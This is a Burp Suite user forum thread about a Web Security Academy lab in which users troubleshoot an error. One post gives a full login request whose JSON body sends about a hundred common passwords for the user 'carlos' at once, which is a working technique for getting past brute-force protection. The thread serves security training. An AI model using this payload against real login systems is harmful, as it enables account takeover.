Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Lab: Broken brute-force protection, multiple credentials per request

phaneendra | Last updated: Dec 23, 2020 04:51PM UTC

When I am trying to paste all the list of passwords it is giving error as specified below.I observed that for any content-length beyond 224 is is giving this error.I am not sure if my observation is wrong and may be useless. HTTP/1.1 500 Internal Server Error Connection: close Content-Length: 21 Internal Server Error

Uthman, PortSwigger Agent | Last updated: Dec 23, 2020 05:31PM UTC

Can you share the full Repeater request, please?

eh.harshit | Last updated: Dec 29, 2020 08:49AM UTC

POST /login HTTP/1.1 Host: ac9b1fe81f35523480c90505005f0064.web-security-academy.net Connection: close Content-Length: 1239 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Accept: */* Origin: https://ac9b1fe81f35523480c90505005f0064.web-security-academy.net Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ac9b1fe81f35523480c90505005f0064.web-security-academy.net/login Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: session=GuKGURggP9ol9uaRBrzq0VfZ7LojKm4h {"csrf":"KkWBycuV6K2aKFZpRIYAEAZ5Ak6zgsb7","username" : "carlos", "password" : [ "123456", "password", "12345678", "qwerty", "123456789", "12345", "1234", "111111", "1234567", "dragon", "123123", "baseball", "abc123", "football", "monkey", "letmein", "shadow", "master", "666666", "qwertyuiop", "123321", "mustang", "1234567890", "michael", "654321", "superman", "1qaz2wsx", "7777777", "121212", "000000", "qazwsx", "123qwe", "killer", "trustno1", "jordan", "jennifer", "zxcvbnm", "asdfgh", "hunter", "buster", "soccer", "harley", "batman", "andrew", "tigger", "sunshine", "iloveyou", "2000", "charlie", "robert", "thomas", "hockey", "ranger", "daniel", "starwars", "klaster", "112233", "george", "computer", "michelle", "jessica", "pepper", "1111", "zxcvbn", "555555", "11111111", "131313", "freedom", "777777", "pass", "maggie", "159753", "aaaaaa", "ginger", "princess", "joshua", "cheese", "amanda", "summer", "love", "ashley", "nicole", "chelsea", "biteme", "matthew", "access", "yankees", "987654321", "dallas", "austin", "thunder", "taylor", "matrix", "mobilemail", "mom", "monitor", "monitoring", "montana", "moon", "moscow", ]}

eh.harshit | Last updated: Dec 29, 2020 09:05AM UTC

you have to change the values like if you entered "carlos" username and after capturing the request and you can modify it in repeater and paste all the passwords in one string ....then it decreases the content-length and it will show 302 found in response i tried it and done.

phaneendra | Last updated: Dec 30, 2020 08:38AM UTC

Thanks @eh.harshit

Mohammed | Last updated: May 16, 2021 03:57AM UTC

I too got the same problem, what is the solution

Liam, PortSwigger Agent | Last updated: May 17, 2021 08:50AM UTC

Have you checked out this video solution? - https://www.youtube.com/watch?v=1Cg0lLGZXBA

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.